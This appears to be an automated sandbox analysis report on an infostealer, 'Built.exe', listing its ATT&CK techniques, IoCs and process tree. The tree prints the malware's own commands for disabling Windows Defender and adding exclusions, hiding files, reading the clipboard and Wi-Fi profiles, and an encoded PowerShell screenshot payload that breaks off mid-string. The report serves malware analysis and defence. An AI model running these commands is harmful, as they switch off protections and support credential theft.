ef8ef1ae54de4bee56fa7c98d35593136468ee7e25e62934b99eda9d220365d6

Analysis

max time kernel
144s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-11-2024 19:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

6.9MB
MD5

ba72313a3bd41e82bdeab6fe7f8926ad
SHA1

20b22242b235f43e717a41846c7b82120c08e7c5
SHA256

ef8ef1ae54de4bee56fa7c98d35593136468ee7e25e62934b99eda9d220365d6
SHA512

1c88de52a15898e1a9919c936fa6ee1f50b543b10bcd76d7d25275f371b9e603c1790465bc90a8dabbc7e37440e49faa356135d0f9db9dabc257e5e7237b4ded
SSDEEP

98304:W0/vITBg6ZpkamaHl3Ne4i3lqoFhTWrf9eQc0MJYzwZNqkzmas5J1n6ksB0rNHMf:WaI9pFeNlpYfMQc2sEhn6ksqO

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1332	powershell.exe
1788	powershell.exe
2996	powershell.exe
4636	powershell.exe
908	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4448	cmd.exe
4400	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2980	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe
2300	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
27	discord.com
59	discord.com
26	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3248	tasklist.exe
3784	tasklist.exe
2320	tasklist.exe
2320	tasklist.exe
4572	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2880	cmd.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c80-21.dat	upx
behavioral2/memory/2300-24-0x00007FF8AC4D0000-0x00007FF8ACAB9000-memory.dmp	upx
behavioral2/files/0x0007000000023c73-27.dat	upx
behavioral2/files/0x0007000000023c7e-29.dat	upx
behavioral2/memory/2300-48-0x00007FF8C1DE0000-0x00007FF8C1DEF000-memory.dmp	upx
behavioral2/files/0x0007000000023c7a-47.dat	upx
behavioral2/files/0x0007000000023c79-46.dat	upx
behavioral2/files/0x0007000000023c78-45.dat	upx
behavioral2/files/0x0007000000023c77-44.dat	upx
behavioral2/files/0x0007000000023c76-43.dat	upx
behavioral2/files/0x0007000000023c75-42.dat	upx
behavioral2/files/0x0007000000023c74-41.dat	upx
behavioral2/files/0x0007000000023c72-40.dat	upx
behavioral2/files/0x0007000000023c85-39.dat	upx
behavioral2/files/0x0007000000023c84-38.dat	upx
behavioral2/files/0x0007000000023c83-37.dat	upx
behavioral2/files/0x0007000000023c7f-34.dat	upx
behavioral2/files/0x0007000000023c7d-33.dat	upx
behavioral2/memory/2300-30-0x00007FF8C0BF0000-0x00007FF8C0C14000-memory.dmp	upx
behavioral2/memory/2300-54-0x00007FF8BC9C0000-0x00007FF8BC9ED000-memory.dmp	upx
behavioral2/memory/2300-56-0x00007FF8BDFA0000-0x00007FF8BDFB9000-memory.dmp	upx
behavioral2/memory/2300-58-0x00007FF8BC370000-0x00007FF8BC393000-memory.dmp	upx
behavioral2/memory/2300-60-0x00007FF8BB230000-0x00007FF8BB3A0000-memory.dmp	upx
behavioral2/memory/2300-62-0x00007FF8BC340000-0x00007FF8BC359000-memory.dmp	upx
behavioral2/memory/2300-64-0x00007FF8C1DD0000-0x00007FF8C1DDD000-memory.dmp	upx
behavioral2/memory/2300-66-0x00007FF8BC190000-0x00007FF8BC1BE000-memory.dmp	upx
behavioral2/memory/2300-74-0x00007FF8C0BF0000-0x00007FF8C0C14000-memory.dmp	upx
behavioral2/memory/2300-79-0x00007FF8BC9C0000-0x00007FF8BC9ED000-memory.dmp	upx
behavioral2/memory/2300-78-0x00007FF8BCB30000-0x00007FF8BCB3D000-memory.dmp	upx
behavioral2/memory/2300-77-0x00007FF8BC170000-0x00007FF8BC184000-memory.dmp	upx
behavioral2/memory/2300-82-0x00007FF8ABCC0000-0x00007FF8ABDDC000-memory.dmp	upx
behavioral2/memory/2300-81-0x00007FF8BDFA0000-0x00007FF8BDFB9000-memory.dmp	upx
behavioral2/memory/2300-73-0x00007FF8AC150000-0x00007FF8AC4C5000-memory.dmp	upx
behavioral2/memory/2300-71-0x00007FF8BBC30000-0x00007FF8BBCE8000-memory.dmp	upx
behavioral2/memory/2300-70-0x00007FF8AC4D0000-0x00007FF8ACAB9000-memory.dmp	upx
behavioral2/memory/2300-83-0x00007FF8BC370000-0x00007FF8BC393000-memory.dmp	upx
behavioral2/memory/2300-96-0x00007FF8BB230000-0x00007FF8BB3A0000-memory.dmp	upx
behavioral2/memory/2300-113-0x00007FF8BC340000-0x00007FF8BC359000-memory.dmp	upx
behavioral2/memory/2300-198-0x00007FF8BC190000-0x00007FF8BC1BE000-memory.dmp	upx
behavioral2/memory/2300-255-0x00007FF8BBC30000-0x00007FF8BBCE8000-memory.dmp	upx
behavioral2/memory/2300-293-0x00007FF8AC150000-0x00007FF8AC4C5000-memory.dmp	upx
behavioral2/memory/2300-309-0x00007FF8AC4D0000-0x00007FF8ACAB9000-memory.dmp	upx
behavioral2/memory/2300-315-0x00007FF8BB230000-0x00007FF8BB3A0000-memory.dmp	upx
behavioral2/memory/2300-310-0x00007FF8C0BF0000-0x00007FF8C0C14000-memory.dmp	upx
behavioral2/memory/2300-345-0x00007FF8AC4D0000-0x00007FF8ACAB9000-memory.dmp	upx
behavioral2/memory/2300-565-0x00007FF8BBC30000-0x00007FF8BBCE8000-memory.dmp	upx
behavioral2/memory/2300-564-0x00007FF8BC190000-0x00007FF8BC1BE000-memory.dmp	upx
behavioral2/memory/2300-569-0x00007FF8ABCC0000-0x00007FF8ABDDC000-memory.dmp	upx
behavioral2/memory/2300-568-0x00007FF8BCB30000-0x00007FF8BCB3D000-memory.dmp	upx
behavioral2/memory/2300-567-0x00007FF8BC170000-0x00007FF8BC184000-memory.dmp	upx
behavioral2/memory/2300-566-0x00007FF8AC4D0000-0x00007FF8ACAB9000-memory.dmp	upx
behavioral2/memory/2300-563-0x00007FF8C1DD0000-0x00007FF8C1DDD000-memory.dmp	upx
behavioral2/memory/2300-562-0x00007FF8BC340000-0x00007FF8BC359000-memory.dmp	upx
behavioral2/memory/2300-561-0x00007FF8BB230000-0x00007FF8BB3A0000-memory.dmp	upx
behavioral2/memory/2300-560-0x00007FF8BC370000-0x00007FF8BC393000-memory.dmp	upx
behavioral2/memory/2300-559-0x00007FF8BDFA0000-0x00007FF8BDFB9000-memory.dmp	upx
behavioral2/memory/2300-558-0x00007FF8BC9C0000-0x00007FF8BC9ED000-memory.dmp	upx
behavioral2/memory/2300-557-0x00007FF8C1DE0000-0x00007FF8C1DEF000-memory.dmp	upx
behavioral2/memory/2300-556-0x00007FF8C0BF0000-0x00007FF8C0C14000-memory.dmp	upx
behavioral2/memory/2300-555-0x00007FF8AC150000-0x00007FF8AC4C5000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1740	cmd.exe
1844	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4136	cmd.exe
2072	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3604	WMIC.exe
2644	WMIC.exe
3624	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4036	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1844	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1332	powershell.exe
1332	powershell.exe
4636	powershell.exe
4636	powershell.exe
908	powershell.exe
908	powershell.exe
4400	powershell.exe
4400	powershell.exe
4400	powershell.exe
4976	powershell.exe
4976	powershell.exe
4976	powershell.exe
1788	powershell.exe
1788	powershell.exe
4308	powershell.exe
4308	powershell.exe
2996	powershell.exe
2996	powershell.exe
452	powershell.exe
452	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1332	powershell.exe
Token: SeIncreaseQuotaPrivilege	2916	WMIC.exe
Token: SeSecurityPrivilege	2916	WMIC.exe
Token: SeTakeOwnershipPrivilege	2916	WMIC.exe
Token: SeLoadDriverPrivilege	2916	WMIC.exe
Token: SeSystemProfilePrivilege	2916	WMIC.exe
Token: SeSystemtimePrivilege	2916	WMIC.exe
Token: SeProfSingleProcessPrivilege	2916	WMIC.exe
Token: SeIncBasePriorityPrivilege	2916	WMIC.exe
Token: SeCreatePagefilePrivilege	2916	WMIC.exe
Token: SeBackupPrivilege	2916	WMIC.exe
Token: SeRestorePrivilege	2916	WMIC.exe
Token: SeShutdownPrivilege	2916	WMIC.exe
Token: SeDebugPrivilege	2916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2916	WMIC.exe
Token: SeRemoteShutdownPrivilege	2916	WMIC.exe
Token: SeUndockPrivilege	2916	WMIC.exe
Token: SeManageVolumePrivilege	2916	WMIC.exe
Token: 33	2916	WMIC.exe
Token: 34	2916	WMIC.exe
Token: 35	2916	WMIC.exe
Token: 36	2916	WMIC.exe
Token: SeDebugPrivilege	2320	tasklist.exe
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeIncreaseQuotaPrivilege	2916	WMIC.exe
Token: SeSecurityPrivilege	2916	WMIC.exe
Token: SeTakeOwnershipPrivilege	2916	WMIC.exe
Token: SeLoadDriverPrivilege	2916	WMIC.exe
Token: SeSystemProfilePrivilege	2916	WMIC.exe
Token: SeSystemtimePrivilege	2916	WMIC.exe
Token: SeProfSingleProcessPrivilege	2916	WMIC.exe
Token: SeIncBasePriorityPrivilege	2916	WMIC.exe
Token: SeCreatePagefilePrivilege	2916	WMIC.exe
Token: SeBackupPrivilege	2916	WMIC.exe
Token: SeRestorePrivilege	2916	WMIC.exe
Token: SeShutdownPrivilege	2916	WMIC.exe
Token: SeDebugPrivilege	2916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2916	WMIC.exe
Token: SeRemoteShutdownPrivilege	2916	WMIC.exe
Token: SeUndockPrivilege	2916	WMIC.exe
Token: SeManageVolumePrivilege	2916	WMIC.exe
Token: 33	2916	WMIC.exe
Token: 34	2916	WMIC.exe
Token: 35	2916	WMIC.exe
Token: 36	2916	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3604	WMIC.exe
Token: SeSecurityPrivilege	3604	WMIC.exe
Token: SeTakeOwnershipPrivilege	3604	WMIC.exe
Token: SeLoadDriverPrivilege	3604	WMIC.exe
Token: SeSystemProfilePrivilege	3604	WMIC.exe
Token: SeSystemtimePrivilege	3604	WMIC.exe
Token: SeProfSingleProcessPrivilege	3604	WMIC.exe
Token: SeIncBasePriorityPrivilege	3604	WMIC.exe
Token: SeCreatePagefilePrivilege	3604	WMIC.exe
Token: SeBackupPrivilege	3604	WMIC.exe
Token: SeRestorePrivilege	3604	WMIC.exe
Token: SeShutdownPrivilege	3604	WMIC.exe
Token: SeDebugPrivilege	3604	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3604	WMIC.exe
Token: SeRemoteShutdownPrivilege	3604	WMIC.exe
Token: SeUndockPrivilege	3604	WMIC.exe
Token: SeManageVolumePrivilege	3604	WMIC.exe
Token: 33	3604	WMIC.exe
Token: 34	3604	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3692 wrote to memory of 2300	3692	Built.exe	83
PID 3692 wrote to memory of 2300	3692	Built.exe	83
PID 2300 wrote to memory of 5016	2300	Built.exe	84
PID 2300 wrote to memory of 5016	2300	Built.exe	84
PID 2300 wrote to memory of 1864	2300	Built.exe	85
PID 2300 wrote to memory of 1864	2300	Built.exe	85
PID 2300 wrote to memory of 3760	2300	Built.exe	88
PID 2300 wrote to memory of 3760	2300	Built.exe	88
PID 2300 wrote to memory of 4888	2300	Built.exe	90
PID 2300 wrote to memory of 4888	2300	Built.exe	90
PID 1864 wrote to memory of 1332	1864	cmd.exe	92
PID 1864 wrote to memory of 1332	1864	cmd.exe	92
PID 5016 wrote to memory of 4636	5016	cmd.exe	93
PID 5016 wrote to memory of 4636	5016	cmd.exe	93
PID 4888 wrote to memory of 2916	4888	cmd.exe	94
PID 4888 wrote to memory of 2916	4888	cmd.exe	94
PID 3760 wrote to memory of 2320	3760	cmd.exe	95
PID 3760 wrote to memory of 2320	3760	cmd.exe	95
PID 2300 wrote to memory of 1392	2300	Built.exe	97
PID 2300 wrote to memory of 1392	2300	Built.exe	97
PID 1392 wrote to memory of 636	1392	cmd.exe	99
PID 1392 wrote to memory of 636	1392	cmd.exe	99
PID 2300 wrote to memory of 4976	2300	Built.exe	145
PID 2300 wrote to memory of 4976	2300	Built.exe	145
PID 4976 wrote to memory of 4108	4976	cmd.exe	102
PID 4976 wrote to memory of 4108	4976	cmd.exe	102
PID 2300 wrote to memory of 3684	2300	Built.exe	103
PID 2300 wrote to memory of 3684	2300	Built.exe	103
PID 3684 wrote to memory of 3604	3684	cmd.exe	105
PID 3684 wrote to memory of 3604	3684	cmd.exe	105
PID 2300 wrote to memory of 2156	2300	Built.exe	106
PID 2300 wrote to memory of 2156	2300	Built.exe	106
PID 2156 wrote to memory of 2644	2156	cmd.exe	108
PID 2156 wrote to memory of 2644	2156	cmd.exe	108
PID 2300 wrote to memory of 2880	2300	Built.exe	109
PID 2300 wrote to memory of 2880	2300	Built.exe	109
PID 2300 wrote to memory of 2124	2300	Built.exe	111
PID 2300 wrote to memory of 2124	2300	Built.exe	111
PID 2880 wrote to memory of 316	2880	cmd.exe	113
PID 2880 wrote to memory of 316	2880	cmd.exe	113
PID 2124 wrote to memory of 908	2124	cmd.exe	114
PID 2124 wrote to memory of 908	2124	cmd.exe	114
PID 2300 wrote to memory of 1272	2300	Built.exe	115
PID 2300 wrote to memory of 1272	2300	Built.exe	115
PID 2300 wrote to memory of 4776	2300	Built.exe	116
PID 2300 wrote to memory of 4776	2300	Built.exe	116
PID 1272 wrote to memory of 3248	1272	cmd.exe	119
PID 1272 wrote to memory of 3248	1272	cmd.exe	119
PID 4776 wrote to memory of 4572	4776	cmd.exe	120
PID 4776 wrote to memory of 4572	4776	cmd.exe	120
PID 2300 wrote to memory of 2336	2300	Built.exe	121
PID 2300 wrote to memory of 2336	2300	Built.exe	121
PID 2300 wrote to memory of 4448	2300	Built.exe	123
PID 2300 wrote to memory of 4448	2300	Built.exe	123
PID 2336 wrote to memory of 1592	2336	cmd.exe	125
PID 2336 wrote to memory of 1592	2336	cmd.exe	125
PID 4448 wrote to memory of 4400	4448	cmd.exe	172
PID 4448 wrote to memory of 4400	4448	cmd.exe	172
PID 2300 wrote to memory of 4960	2300	Built.exe	127
PID 2300 wrote to memory of 4960	2300	Built.exe	127
PID 2300 wrote to memory of 2604	2300	Built.exe	129
PID 2300 wrote to memory of 2604	2300	Built.exe	129
PID 2300 wrote to memory of 4136	2300	Built.exe	130
PID 2300 wrote to memory of 4136	2300	Built.exe	130

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
316	attrib.exe
3496	attrib.exe
5020	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3692
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3760
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1392
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4976
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2156
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2880
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Views/modifies file attributes
      PID:316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1272
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4776
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2336
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4960
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2604
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4136
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1512
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1828
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAF